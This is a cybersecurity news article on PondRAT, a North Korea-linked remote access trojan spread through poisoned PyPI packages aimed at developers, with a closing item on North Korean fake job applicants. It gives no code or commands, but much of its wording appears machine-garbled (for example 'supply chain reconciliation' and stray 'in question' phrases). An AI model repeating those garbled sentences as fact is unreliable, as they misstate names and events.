New PondRAT Malware Hidden in Python Packages Targets Software Developers

September 23, 2024Ravi LakshmananSoftware Security / Supply Chain

North Korea-linked threat actors have been observed using poisoned Python packages as a means of distributing a new malware called PondRAT in an ongoing campaign.

According to new findings from Palo Alto Networks Unit 42, PondRAT is considered a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor previously attributed to the Lazarus Group. deployed in related attacks 3CX supply chain reconciliation last year.

Some of these attacks are part of a sustained cyber attack campaign referred to as a “Cyber ​​Attack.” Dream Job OperationPotential targets are offered attractive job offers to trick them into downloading malware.

“The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular repository of open-source Python packages,” Unit 42 researcher Yoav Zemah said. in questionattributes the activity to a threat actor called Gleaming Pisces with medium confidence.

The enemy too watched Citrine Sleet, Labyrinth Chollima, Nickel Academy, and by the broader cybersecurity community under the names UNC4736, a subset of the Lazarus Group also known for distributing the AppleJeus malware.

The ultimate goal of the attacks is thought to be to “secure access to supply chain suppliers via developer endpoints and then gain access to the suppliers’ customers’ endpoints, as observed in previous incidents.”

Below is the list of malicious packages removed from the PyPI repository –

The infection chain is fairly simple, as once the packages are downloaded and installed on developer systems, they are designed to execute the next stage, which is coded to run Linux and macOS versions of the RAT malware from a remote server.

Further analysis of PondRAT revealed similarities to both POOLRAT and AppleJeus; the attacks also distributed new Linux versions of POOLRAT.

“The Linux and macOS versions of POOLRAT use the same function structure to load their configurations, offering similar method names and functionality,” Zemah said.

“Additionally, the method names in both variants are strikingly similar and the strings are nearly identical. Finally, the mechanism that processes commands (from the command and control server) is nearly identical.”

A leaner version of POOLRAT, PondRAT comes with the ability to upload and download files, pause operations at a predefined time interval, and execute arbitrary commands.

“Evidence on additional Linux versions of POOLRAT has shown that Gleaming Pisces has improved its capabilities on both Linux and macOS platforms,” ​​Unit 42 said.

“Weaponization of seemingly legitimate Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can lead to a malware infection that compromises the entire network.”

The revelation comes as KnowBe4 was found to have been tricked into hiring a North Korean threat actor as an employee. in question More than a dozen companies “either hired North Korean employees or were besieged by a flood of fake resumes and applications sent by North Koreans hoping to find work at their organizations.”

He described the activity tracked by CrowdStrike as: Famous ChollimaIt was described as a “complex, industrial, nation-state operation” and said to pose “a serious risk to any company with employees working exclusively remotely.”